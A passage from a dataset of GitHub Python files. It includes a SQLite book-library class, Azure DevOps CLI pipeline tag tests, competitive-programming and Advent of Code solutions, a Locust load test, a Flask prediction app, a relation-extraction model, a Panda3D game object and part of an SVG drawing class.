v_w = sorted(v_w, key=lambda i: i[0] / i[1], reverse=True)\n\n v_w = np.array(v_w)\n\n print(new_matrix(len(v_w), len(v_w), max_weight, v_w))\n\n\nif __name__ == '__main__':\n pass","repo_name":"webclinic017/cut_stock_problem_algorithms","sub_path":"grasp.py","file_name":"grasp.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"2090959656","text":"from modules.Book import Book\r\nfrom modules.const import HEADERSLOWERCASE\r\nfrom modules.search_str_to_dict import search_str_to_dict\r\nimport re\r\nimport sqlite3 as sql\r\n\r\nclass Library:\r\n def __init__(self) -> None:\r\n self.connection = sql.connect(\"data/data.db\")\r\n self.cursor = self.connection.cursor()\r\n self.cursor.execute('''\r\n CREATE TABLE IF NOT EXISTS books (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n title TEXT,\r\n author TEXT,\r\n type TEXT,\r\n tome INTEGER\r\n )\r\n ''')\r\n self.connection.commit()\r\n\r\n \r\n self.key_priority = HEADERSLOWERCASE.copy()\r\n self.reverse = False\r\n\r\n def get_all(self):\r\n query = self.cursor.execute(\"SELECT * FROM books\")\r\n return query.fetchall()\r\n \r\n def get_elt(self, title, author, type, tome):\r\n query = self.cursor.execute(\"SELECT * FROM books WHERE title=? AND author=? AND type=? AND tome=?\",(title, author, type, tome))\r\n return query.fetchall()\r\n \r\n \r\n\r\n def get(self, start:int=-1, limit:int=-1, filter:str=\"\"):\r\n # param check in\r\n try:\r\n start = int(start)\r\n limit = int(limit)\r\n except ValueError:\r\n return [] \r\n \r\n request = \"SELECT * FROM books\"\r\n\r\n reverse = \" DESC\" if self.reverse else \"\"\r\n key_priority_copy = self.key_priority.copy()\r\n key_priority_copy[0] += reverse\r\n key_tmp = \", \".join(key_priority_copy)\r\n\r\n # WHERE\r\n if re.match(\"^[\\w;: ]+$\", filter):\r\n buff = search_str_to_dict(filter)\r\n if buff:\r\n request += \" WHERE \"\r\n i = 0\r\n for key,val in buff.items():\r\n request += \"{} LIKE '{}%' \".format(key,val)\r\n if i < len(buff)-1:\r\n request += \"AND \"\r\n i += 1\r\n\r\n # ORDER BY\r\n request += \" ORDER BY \" + key_tmp\r\n\r\n # LIMIT OFFSET\r\n if start >= 0 and limit >=0:\r\n request += \" LIMIT \" + str(limit) + \" OFFSET \" + str(start)\r\n\r\n query = self.cursor.execute(request)\r\n return query.fetchall()\r\n \r\n def get_key_sort(self):\r\n return self.key_priority[0]\r\n\r\n def is_in(self, book:Book) -> bool:\r\n query = self.cursor.execute(\"SELECT * FROM books WHERE title=? AND author=? AND type=? AND tome=?\", (book.title, book.author, book.type, book.tome))\r\n return query.fetchall() != []\r\n\r\n def set_sort_order(self, key:str):\r\n # back to original order\r\n if key in HEADERSLOWERCASE:\r\n self.key_priority = HEADERSLOWERCASE.copy()\r\n self.key_priority.remove(key)\r\n self.key_priority.insert(0, key)\r\n\r\n def set_reverse(self, val:bool):\r\n if val==True or val==False:\r\n self.reverse = val\r\n \r\n def add_books(self, data: list[Book]) -> bool:\r\n \"\"\"\r\n Add multiple books to the database, ignoring duplicates.\r\n\r\n Args:\r\n data (list[Book]): A list of Book objects to be added.\r\n\r\n Returns:\r\n bool: True if all books were added successfully, False if there was an error.\r\n \"\"\"\r\n try:\r\n for book in data:\r\n if isinstance(book, Book):\r\n if not self.is_in(book):\r\n query = \"INSERT INTO books(title, author, type, tome) VALUES (?,?,?,?)\"\r\n parameters = (book.title, book.author, book.type, book.tome)\r\n self.cursor.execute(query, parameters)\r\n else:\r\n return False # Invalid data type in the list\r\n self.connection.commit()\r\n return True\r\n except IndentationError:\r\n self.connection.rollback()\r\n return False\r\n \r\n\r\n def delete_book(self, data: list[Book]) -> bool:\r\n \"\"\"\r\n Delete a book from the database.\r\n\r\n Args:\r\n data (list[Book]): A list of Book objects to be deleted.\r\n\r\n Returns:\r\n bool: True if the books was deleted successfully, False if there was an error.\r\n \"\"\"\r\n try:\r\n for book in data:\r\n if isinstance(book, Book):\r\n if self.is_in(book):\r\n self.cursor.execute(\r\n \"DELETE FROM books WHERE title=? AND author=? AND type=? AND tome=?\",\r\n (book.title, book.author, book.type, book.tome)\r\n )\r\n else:\r\n return False\r\n else:\r\n return False # Invalid data type\r\n self.connection.commit()\r\n return True\r\n except Exception:\r\n self.connection.rollback()\r\n return False\r\n\r\n def update_book(self, old_book: Book, new_book: Book) -> bool:\r\n \"\"\"\r\n Update a book's information in the database.\r\n\r\n Args:\r\n old_book (Book): The existing Book object to be updated.\r\n new_book (Book): The new Book object with updated information.\r\n\r\n Returns:\r\n bool: True if the book was updated successfully, False if there was an error.\r\n \"\"\"\r\n try:\r\n if isinstance(old_book, Book) and isinstance(new_book, Book):\r\n if self.is_in(old_book):\r\n query = \"UPDATE books SET title=?, author=?, type=?, tome=? WHERE title=? AND author=? AND type=? AND tome=?\"\r\n parameters = (new_book.title, new_book.author, new_book.type, new_book.tome, old_book.title, old_book.author, old_book.type, old_book.tome)\r\n self.cursor.execute(query, parameters)\r\n self.connection.commit()\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False # Invalid data types\r\n except Exception:\r\n self.connection.rollback()\r\n return False\r\n\r\n def close(self):\r\n self.connection.close()","repo_name":"Baltemor369/manga-library","sub_path":"MangaManager/modules/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34113340978","text":"import os\nimport unittest\n\nfrom azure_devtools.scenario_tests import AllowLargeResponse\nfrom .utilities.helper import DevopsScenarioTest, disable_telemetry, set_authentication, get_test_org_from_env_variable\n\nDEVOPS_CLI_TEST_ORGANIZATION = get_test_org_from_env_variable() or 'https://dev.azure.com/devops-cli-test-org'\n\nclass PipelinesBuildTagTests(DevopsScenarioTest): \n @AllowLargeResponse(size_kb=3072)\n @disable_telemetry\n @set_authentication\n def test_build_tag_listAddDelete(self):\n self.cmd('az devops configure --defaults organization=' + DEVOPS_CLI_TEST_ORGANIZATION + ' project=buildtests')\n\n build_definition_name = 'BuildTests Definition1'\n\n #QueueBuild to get a build ID\n queue_build_command = 'az pipelines build queue --definition-name \"' + build_definition_name + '\" --detect false --output json'\n queue_build_output = self.cmd(queue_build_command).get_output_in_json()\n queued_build_id = queue_build_output[\"id\"]\n\n try:\n #Add build tag to queued build\n add_build_tag_command = 'az pipelines build tag add --build-id ' + str(queued_build_id) + ' --tags TestTag0 --detect false --output json'\n add_build_tag_output = self.cmd(add_build_tag_command).get_output_in_json()\n assert len(add_build_tag_output) == 1\n assert add_build_tag_output == ['TestTag0']\n\n #Add build tags to queued build\n add_build_tag_command = 'az pipelines build tag add --build-id ' + str(queued_build_id) + ' --tags \"TestTag1,TestTag2\" --detect false --output json'\n add_build_tag_output = self.cmd(add_build_tag_command).get_output_in_json()\n assert len(add_build_tag_output) == 3\n assert add_build_tag_output == ['TestTag0', 'TestTag1', \"TestTag2\"]\n\n #List build tags added to queued build\n list_build_tag_command = 'az pipelines build tag list --build-id ' + str(queued_build_id) + ' --detect false --output json'\n list_build_tag_output = self.cmd(list_build_tag_command).get_output_in_json()\n assert len(list_build_tag_output) == 3\n assert list_build_tag_output == ['TestTag0', 'TestTag1', \"TestTag2\"]\n\n #Delete build tag from queued build\n delete_build_tag_command = 'az pipelines build tag delete --build-id ' + str(queued_build_id) + ' --tag TestTag2 --detect false --output json'\n delete_build_tag_output = self.cmd(delete_build_tag_command).get_output_in_json()\n assert len(delete_build_tag_output) == 2\n assert delete_build_tag_output == ['TestTag0', 'TestTag1']\n finally:\n #Delete tags added for test\n delete_build_tag_command = 'az pipelines build tag delete --build-id ' + str(queued_build_id) + ' --tag TestTag1 --detect false --output json'\n self.cmd(delete_build_tag_command)\n delete_build_tag_command = 'az pipelines build tag delete --build-id ' + str(queued_build_id) + ' --tag TestTag0 --detect false --output json'\n self.cmd(delete_build_tag_command)\n\n #Verify deletion\n list_build_tag_command = 'az pipelines build tag list --build-id ' + str(queued_build_id) + ' --detect false --output json'\n add_build_tag_output = self.cmd(list_build_tag_command).get_output_in_json()\n if (len(add_build_tag_output) == 0):\n assert 1","repo_name":"Azure/azure-devops-cli-extension","sub_path":"tests/test_pipelinesBuildTagTest.py","file_name":"test_pipelinesBuildTagTest.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":590,"dataset":"github-code","pt":"45"} +{"seq_id":"16588155068","text":"import sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_Sample_Input_1(self):\n input = \"\"\"3\n2 2 4\"\"\"\n output = \"\"\"4 0 4\"\"\"\n self.assertIO(input, output)\n\n def test_Sample_Input_2(self):\n input = \"\"\"5\n3 8 7 5 5\"\"\"\n output = \"\"\"2 4 12 2 8\"\"\"\n self.assertIO(input, output)\n\n def test_Sample_Input_3(self):\n input = \"\"\"3\n1000000000 1000000000 0\"\"\"\n output = \"\"\"0 2000000000 0\"\"\"\n self.assertIO(input, output)\n\ndef resolve():\n # 偶数奇数に分けて累積和を取って、\n # 奇数番の山だったらそれより大きい奇数番のダムの水量-それより小さい奇数番のダムの水量-それより大きい偶数番のダムの水量+それより小さい偶数番のダムの水量\n # 偶数番の山だったらそれより大きい偶数番のダムの水量-それより小さい偶数番のダムの水量-それより大きい奇数番のダムの水量+それより小さい奇数番のダムの水量\n N = int(input())\n A = [int(x) for x in input().split(\" \")]\n odd_dam = [0]*(N+1)\n even_dam = [0]*(N+1)\n for i in range(N):\n if (i+1)%2:\n odd_dam[i+1]=A[i]+odd_dam[i]\n even_dam[i+1]=even_dam[i]\n else:\n odd_dam[i+1]=odd_dam[i]\n even_dam[i+1]=A[i]+even_dam[i]\n \n ans = [0]*N\n for i in range(N):\n if (i+1)%2:\n ans[i] = odd_dam[-1] - 2*odd_dam[i] - even_dam[-1] + 2*even_dam[i]\n else:\n ans[i] = even_dam[-1] - 2*even_dam[i] - odd_dam[-1] + 2*odd_dam[i]\n print(*ans)\n\nresolve()\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"TsukasaDEKA/competitive_programing","sub_path":"atcoder/current/ABC/101_200/ABC133/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3655504085","text":"import sys, os, io, atexit\ninput = lambda : sys.stdin.readline().rstrip('\\r\\n')\nstdout = io.BytesIO()\nsys.stdout.write = lambda s : stdout.write(s.encode(\"ascii\"))\natexit.register(lambda : os.write(1, stdout.getvalue()))\nfrom collections import deque\n\nN = int(input())\narr = [[0 for _ in range(N)] for _ in range(N)]\n\nfor i in range(N):\n arr[i] = list(map(int, input().split()))\n\nvisited = [[0 for _ in range(N)] for _ in range(N)]\n\ndef bfs(x):\n queue = deque()\n queue.append(x)\n check = [0 for _ in range(N)]\n\n while queue:\n q = queue.popleft()\n\n for i in range(N):\n if check[i] == 0 and arr[q][i] == 1:\n queue.append(i)\n check[i] = 1\n visited[x][i] = 1\n\nfor i in range(N):\n bfs(i)\n\nfor i in visited:\n print(*i) ","repo_name":"ellynhan/challenge100-codingtest-study","sub_path":"wlwl1011/BOJ/heybob/1회/11403.py","file_name":"11403.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"45"} +{"seq_id":"44213287613","text":"with open('input.txt', 'rt') as f:\n lines = f.read().split('\\n')\n\ndef part1(lines):\n h, d = 0, 0\n for line in lines:\n cmd, num = line.split(' ')\n if cmd == 'forward':\n h += int(num)\n elif cmd == 'down':\n d += int(num)\n elif cmd == 'up':\n d -= int(num)\n else:\n raise ValueError(f'Invalid cmd {cmd}')\n return h * d\n\ndef part2(lines):\n h, d, aim = 0, 0, 0\n for line in lines:\n cmd, num = line.split(' ')\n if cmd == 'forward':\n h += int(num)\n d += aim * int(num)\n elif cmd == 'down':\n aim += int(num)\n elif cmd == 'up':\n aim -= int(num)\n else:\n raise ValueError(f'Invalid cmd {cmd}')\n return h * d\n\nprint(f'Part1: {part1(lines)}')\nprint(f'Part2: {part2(lines)}')","repo_name":"malhotraa/aoc2021","sub_path":"day2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71800182537","text":"from locust import HttpLocust, TaskSet, task\n\n\nclass FlowException(Exception):\n pass\n\n\nclass UserBehavior(TaskSet):\n @task(1)\n def check_flow(self):\n # step 1\n new_post = {'userId': 1, 'title': 'my shiny new post', 'body': 'hello everybody'}\n post_response = self.client.post('/posts', json=new_post)\n if post_response.status_code != 201:\n raise FlowException('post not created')\n post_id = post_response.json().get('id')\n\n # step 2\n new_comment = {\n \"postId\": post_id,\n \"name\": \"my comment\",\n \"email\": \"test@user.habr\",\n \"body\": \"Author is cool. Some text. Hello world!\"\n }\n comment_response = self.client.post('/comments', json=new_comment)\n if comment_response.status_code != 201:\n raise FlowException('comment not created')\n comment_id = comment_response.json().get('id')\n\n # step 3\n self.client.get(f'/comments/{comment_id}', name='/comments/[id]')\n if comment_response.status_code != 200:\n raise FlowException('comment not read')\n\n\nclass WebsiteUser(HttpLocust):\n task_set = UserBehavior\n min_wait = 1000\n max_wait = 2000\n","repo_name":"Ypurek/performance-sample","sub_path":"locust_files/locust_transaction_test1.py","file_name":"locust_transaction_test1.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"17781764707","text":"# Write a Python program which gets a string from the commandline argument and write a\n# function to count the number of occurrence of a specific character in a string.\n\nimport sys\n\n\ndef character_occurs(string, char):\n count = 0\n if len(char) > 1:\n raise Exception(\"The second parameter is not a character!\")\n\n for c in string:\n if c == char:\n count += 1\n return count\n\n\nif len(sys.argv) < 3:\n print(\"Adj meg argumentumként egy stringet és karaktert!\")\n quit()\n\nc = character_occurs(sys.argv[1], sys.argv[2])\n\nprint(\"A '{}' karakter előfordulásainak száma a '{}' karakterláncban {}\".format(sys.argv[2], sys.argv[1], c))\n","repo_name":"pacifastacus/Programming1","sub_path":"ex03/negyedik.py","file_name":"negyedik.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29931136170","text":"from flask import Flask,render_template,request\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom pipeline.predict_pipeline import CustomData,PredictPipeline\n\n\napplication = Flask(__name__)\napp = application\n@app.route('/')\ndef indeX():\n return render_template('home.html')\n\n@app.route('/predictdata',methods=['GET','POST'])\ndef predict_data():\n if request.method == 'GET':\n return render_template('home.html')\n else:\n data = CustomData(gender=request.form.get('gender'),\n race_ethnicity=request.form.get('ethnicity'),\n parental_level_of_education=request.form.get('parental_level_of_education'),\n lunch=request.form.get('lunch'),\n test_preparation_course=request.form.get('test_preparation_course'),\n reading_score=float(request.form.get('writing_score')),\n writing_score=float(request.form.get('reading_score')))\n pred_df = data.data_frame()\n print(pred_df)\n print(\"Before Prediction\")\n predictPipeline = PredictPipeline()\n print(\"Mid Prediction\")\n result = predictPipeline.predict(pred_df)\n print(\"After Prediction\")\n return render_template('home.html',results=result[0])\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Abdul-Basith-R/Student-Performance-Monitoring","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42400709269","text":"import torch\nfrom torch import nn, optim\nfrom .base_model import BagRE\n\nclass BagOne(BagRE):\n \"\"\"\n Instance one(max) for bag-level relation extraction.\n \"\"\"\n\n def __init__(self, sentence_encoder, num_class, rel2id):\n \"\"\"\n Args:\n sentence_encoder: encoder for sentences\n num_class: number of classes\n id2rel: dictionary of id -> relation name mapping\n \"\"\"\n super().__init__()\n self.sentence_encoder = sentence_encoder\n self.num_class = num_class\n self.fc = nn.Linear(self.sentence_encoder.hidden_size, num_class)\n self.softmax = nn.Softmax(-1)\n self.rel2id = rel2id\n self.id2rel = {}\n self.drop = nn.Dropout()\n for rel, id in rel2id.items():\n self.id2rel[id] = rel\n\n def infer(self, bag):\n \"\"\"\n Args:\n bag: bag of sentences with the same entity pair\n [{\n 'text' or 'token': ..., \n 'h': {'pos': [start, end], ...}, \n 't': {'pos': [start, end], ...}\n }]\n Return:\n (relation, score)\n \"\"\"\n self.eval()\n tokens = []\n pos1s = []\n pos2s = []\n masks = []\n for item in bag:\n token, pos1, pos2, mask = self.sentence_encoder.tokenize(item)\n tokens.append(token)\n pos1s.append(pos1)\n pos2s.append(pos2)\n masks.append(mask)\n tokens = torch.cat(tokens, 0).unsqueeze(0) # (n, L)\n pos1s = torch.cat(pos1s, 0).unsqueeze(0)\n pos2s = torch.cat(pos2s, 0).unsqueeze(0)\n masks = torch.cat(masks, 0).unsqueeze(0)\n scope = torch.tensor([[0, len(bag)]]).long() # (1, 2)\n bag_logits = self.forward(None, scope, tokens, pos1s, pos2s, masks, train=False).squeeze(0) # (N) after softmax\n score, pred = bag_logits.max(0)\n score = score.item()\n pred = pred.item()\n rel = self.id2rel[pred]\n return (rel, score)\n \n def forward(self, label, scope, token, pos1, pos2, mask=None, train=True, bag_size=0):\n \"\"\"\n Args:\n label: (B), label of the bag\n scope: (B), scope for each bag\n token: (nsum, L), index of tokens\n pos1: (nsum, L), relative position to head entity\n pos2: (nsum, L), relative position to tail entity\n mask: (nsum, L), used for piece-wise CNN\n Return:\n logits, (B, N)\n \"\"\"\n # Encode\n if bag_size > 0:\n token = token.view(-1, token.size(-1))\n pos1 = pos1.view(-1, pos1.size(-1))\n pos2 = pos2.view(-1, pos2.size(-1))\n if mask is not None:\n mask = mask.view(-1, mask.size(-1))\n else:\n begin, end = scope[0][0], scope[-1][1]\n token = token[:, begin:end, :].view(-1, token.size(-1))\n pos1 = pos1[:, begin:end, :].view(-1, pos1.size(-1))\n pos2 = pos2[:, begin:end, :].view(-1, pos2.size(-1))\n if mask is not None:\n mask = mask[:, begin:end, :].view(-1, mask.size(-1))\n scope = torch.sub(scope, torch.zeros_like(scope).fill_(begin))\n\n if train or bag_size > 0:\n if mask is not None:\n rep = self.sentence_encoder(token, pos1, pos2, mask) # (nsum, H) \n else:\n rep = self.sentence_encoder(token, pos1, pos2) # (nsum, H) \n else:\n rep = []\n bs = 256\n total_bs = len(token) // bs + (1 if len(token) % bs != 0 else 0)\n for b in range(total_bs):\n with torch.no_grad():\n left = bs * b\n right = min(bs * (b + 1), len(token))\n if mask is not None: \n rep.append(self.sentence_encoder(token[left:right], pos1[left:right], pos2[left:right], mask[left:right]).detach()) # (nsum, H) \n else:\n rep.append(self.sentence_encoder(token[left:right], pos1[left:right], pos2[left:right]).detach()) # (nsum, H) \n rep = torch.cat(rep, 0)\n\n # Max\n if train:\n if bag_size == 0:\n bag_rep = []\n query = torch.zeros((rep.size(0))).long()\n if torch.cuda.is_available():\n query = query.cuda()\n for i in range(len(scope)):\n query[scope[i][0]:scope[i][1]] = label[i]\n\n for i in range(len(scope)): # iterate over bags\n bag_mat = rep[scope[i][0]:scope[i][1]] # (n, H)\n instance_logit = self.softmax(self.fc(bag_mat)) # (n, N)\n # select j* which scores highest on the known label\n max_index = instance_logit[:, query[i]].argmax() # (1)\n bag_rep.append(bag_mat[max_index]) # (n, H) -> (H)\n bag_rep = torch.stack(bag_rep, 0) # (B, H)\n bag_rep = self.drop(bag_rep)\n bag_logits = self.fc(bag_rep) # (B, N)\n else:\n batch_size = label.size(0)\n query = label # (B)\n rep = rep.view(batch_size, bag_size, -1)\n instance_logit = self.softmax(self.fc(rep))\n max_index = instance_logit[torch.arange(batch_size), :, query].argmax(-1)\n bag_rep = rep[torch.arange(batch_size), max_index]\n\n bag_rep = self.drop(bag_rep)\n bag_logits = self.fc(bag_rep) # (B, N)\n\n else:\n if bag_size == 0:\n bag_logits = []\n for i in range(len(scope)):\n bag_mat = rep[scope[i][0]:scope[i][1]] # (n, H)\n instance_logit = self.softmax(self.fc(bag_mat)) # (n, N)\n logit_for_each_rel = instance_logit.max(dim=0)[0] # (N)\n bag_logits.append(logit_for_each_rel)\n bag_logits = torch.stack(bag_logits, 0) # after **softmax**\n else:\n batch_size = rep.size(0) // bag_size\n rep = rep.view(batch_size, bag_size, -1)\n bag_logits = self.softmax(self.fc(rep)).max(1)[0]\n\n return bag_logits\n\n","repo_name":"thunlp/OpenNRE","sub_path":"opennre/model/bag_one.py","file_name":"bag_one.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","stars":4131,"dataset":"github-code","pt":"45"} +{"seq_id":"35887872172","text":"def somma(values):\n \"\"\"\n Args:\n values to sum\n Return:\n sum of values\n \"\"\"\n count = 0\n for value in values:\n count+=value\n return count\n\n\ndef media(lista):\n \"\"\"\n Args:\n values for the average\n Return:\n average\n \"\"\"\n sum = somma(lista)\n if len(lista)==0:\n return 0\n else:\n return sum/len(lista)\n","repo_name":"gabrielecosta/python_unipa","sub_path":"es_1/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4639229020","text":"\r\nfrom pandac.PandaModules import (\r\n\tQuat,OdeBody, OdeMass, OdeBoxGeom, BitMask32)\n\t\nfrom pandac.PandaModules import (CollisionTraverser,\r\n\tCollisionSphere, CollisionNode, NodePath,\r\n\tPandaNode, CollisionHandlerEvent)\r\n\r\nfrom model.SurfaceType import SurfaceType\r\n\r\nclass Coin:\r\n\t\"\"\"\r\n\tAn object that a ball collects.\r\n\t\"\"\"\r\n\tMODEL = \"../egg/kolikko.egg\"\r\n\tcollectable = 0\r\n\r\n\tdef __init__(self, model, world, space, pos):\n\t\tself.model = model\r\n\t\tself.world = world\r\n\t\tself.space = space\n\t\tself.collHandEvent = CollisionHandlerEvent()\r\n\t\tself.collHandEvent.addInPattern('into-%in')\r\n\t\tself.addBox(pos)\r\n\t\tself.isCollected = False\r\n\t\tCoin.collectable += 1\r\n \r\n\tdef collect(self):\r\n\t\tif not self.isCollected:\r\n\t\t\tself.isCollected = True\r\n\t\t\tself.box.setColor(1,0,0)\r\n\t\t\tCoin.collectable -= 1\n\n\tdef onCollide(self, entry):\n\t\tbody1 = entry.getFromNodePath()\n\t\tballNode = self.model.getBall().getModelNode()\n\t\tif ballNode and ballNode == body1.getParent():\n\t\t\tself.collect()\n\r\n\tdef addBox(self, pos):\r\n\t\tlx,ly,lz = 1,1,1 # dimension\r\n\t\tpx,py,pz = pos # position\r\n\t\tname = \"box\" + str(pos)\r\n\t\tself.box = loader.loadModel(self.MODEL)\r\n\t\tself.box.setPos(-0.5,-0.5,-0.5)\r\n\t\tself.box.flattenLight() # ApplyTransform\r\n\t\tself.box.reparentTo(render)\r\n\t\t\r\n\t\t# Make sure its center is at 0, 0, 0 like OdeBoxGeom\r\n\t\tself.box.setPos( px -lx/2, py -ly/2, pz -lz/2)\r\n\t\tself.box.setScale( lx, ly, lz )\r\n\t\tself.box.setHpr( 0, 50, 0 )\r\n\t\t\n\t\t# Offset z by -1.0 because the coin model was so small\n\t\tcSphere = CollisionSphere(pos[0], pos[1], pos[2] - 1.0, 1)\r\n\t\tcNode = CollisionNode(name)\r\n\t\tcNode.addSolid(cSphere)\r\n\t\t\r\n\t\tmodel = render.find(name)\r\n\t\tif not model.isEmpty():\r\n\t\t\tmodel.removeNode()\r\n\t\t\t\r\n\t\tcnodePath = render.attachNewNode( cNode )\r\n\t\t#cnodePath.show()\r\n\t\tbase.cTrav.addCollider( cnodePath, self.collHandEvent )\r\n\t\tbase.accept( 'into-' + name, self.onCollide )\n\t\t\n\t\t# Implementation below would not allow coins to float?\r\n\t\t# define mass\r\n\t\t\"\"\"\n\t\tmass = OdeMass()\r\n\t\tmass.setBox(500, lx, ly, lz)\r\n\t\t\r\n\t\tself.boxBody = OdeBody( self.world )\r\n\t\tself.boxBody.setPosition( self.box.getPos(render) )\r\n\t\tself.boxBody.setQuaternion( self.box.getQuat(render) )\r\n\t\tself.boxBody.setMass( mass )\r\n\t\t\r\n\t\tself.geom = OdeBoxGeom( self.space, lx, ly, lz)\r\n\t\tself.space.setSurfaceType( self.geom, SurfaceType.COIN )\r\n\t\tself.geom.setBody( self.boxBody )\n\t\tself.boxBody = None\r\n\t\t\"\"\"\r\n\tdef updateModelNode(self):\n\t\treturn None\n\t\t#None\r\n\t\t#self.box.setPos( render, self.boxBody.getPosition() )\r\n\t\t#self.box.setQuat(render, Quat(self.boxBody.getQuaternion() ) )\r\n\t\r\n\tdef getBody(self):\r\n\t\treturn None\n\t\t#return self.boxBody\r\n\t\r\n\tdef removeNode(self):\r\n\t\tif not self.isCollected:\r\n\t\t\tCoin.collectable -= 1\r\n\t\t# http://www.panda3d.org/apiref.php?page=NodePath#removeNode\r\n\t\tself.box.removeNode()\r\n\r\n","repo_name":"Panda3D-public-projects-archive/bounce3d","sub_path":" bounce3d/src/model/Coin.py","file_name":"Coin.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13777971248","text":"import torchvision\nimport torch.nn as nn\nimport torch\nimport numpy as np\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\n\ndef getFastRCNNResnet50Fpn(pretrained):\n return torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=pretrained)\n\n\ndef getMaskRCNNResnet50Fpn(pretrained):\n return torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=pretrained)\n\n\ndef conv_out_features(model, shape):\n o = model.cls_score(torch.zeros(1, *shape))\n return int(np.prod(o.size()))\n\n\ndef ChooseModel(input, n_classes, freeze=False):\n\n if input == \"faster\":\n print(f\"model is Faster RCNN resnet 50\")\n model = getFastRCNNResnet50Fpn(pretrained=True)\n if freeze:\n for param in model.parameters():\n param.requires_grad = False\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, n_classes)\n\n elif input == \"mask\":\n print(f\"model is Mask RCNN\")\n model = getMaskRCNNResnet50Fpn(pretrained=True)\n if freeze:\n for param in model.parameters():\n param.requires_grad = False\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, n_classes)\n in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels\n hidden_layer = 256\n model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n hidden_layer,\n n_classes)\n return model\n\n\ndef main():\n model = ChooseModel(\"mask\", 5, True)\n print(f\"model is: {model}\")\n print(\"Pretrained classifiers\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DennisJensen95/solar-panel-inspection","sub_path":"components/neural_nets/NNClassifier.py","file_name":"NNClassifier.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36547793670","text":"from math import pi\n\nclass Canvas2_Draw():\n def Draw_Text(self,p,text,classs):\n self.Image_Draw_Text(self.P2Pix(p),text,classs)\n \n \n def Draw_Point(self,p,size,classs,color,parms={}):\n return self.Image_Draw_Point(self.P2Pix(p),size,classs,color,parms={})\n \n def Draw_Segment(self,p1,p2,classs,color=\"\",parms={}):\n if (not color): color=\"magenta\"\n return self.Image_Draw_Line(self.P2Pix(p1),self.P2Pix(p2),classs,color,parms)\n \n def Draw_Node(self,p,i,size,classs,textclass,color,parms={},textparms={}):\n color=\"cyan\"\n return self.Image_Draw_Node(\n self.P2Pix(p),\n i,\n size,\n classs,\n textclass,\n color,\n parms,\n textparms\n )\n\n #Drawing points as nodes\n def Draw_Nodes(self,ps,size,classs,textclass,color,parms={},textparms={},every=1):\n\n svns=[]\n for i in range( len(ps) ):\n if ( (i % every)==0):\n svn=self.Draw_Node(\n ps[i],\n i,\n size,\n classs,\n textclass,\n color,\n parms,\n textparms\n )\n\n svns.append(svn+\"\\n\")\n\n return svns\n \n \n def Draw_Vector(self,p1,p2,classs,color=\"maroon\",parms={}):\n px1=self.P2Pix(p1)\n px2=self.P2Pix(p2)\n\n svg=\"\\n\".join( self.SVG_Vector(px1,px2,classs,color,parms) )\n self.SVG.append( svg )\n return svg\n\n def Draw_CS(self,O,e,f,classs,color,parms={}):\n svg=\"\"\n svg=svg+self.Image_SVG_Comment(\"Drawing CS: \"+classs)\n\n svg=svg+self.Draw_Point(O,self.Point_Size,classs,color,parms)\n svg=svg+self.Draw_Vector(O,O+e,classs,color,parms)\n\n if (f):\n svg=svg+self.Draw_Vector(O,O+f,classs,color,parms)\n\n return svg\n \n \n def Draw_Circle(self,pc,r,classs,color=\"\",parms={}):\n if (not color): color=\"brown\"\n \n pcx=self.P2Pix(pc)\n rx=self.V2Pix([r,r])\n\n return self.Image_Draw_Circle(pcx,rx,classs,color,parms)\n\n def Draw_Polyline(self,ps,classs,color,parms={},close=False):\n \n 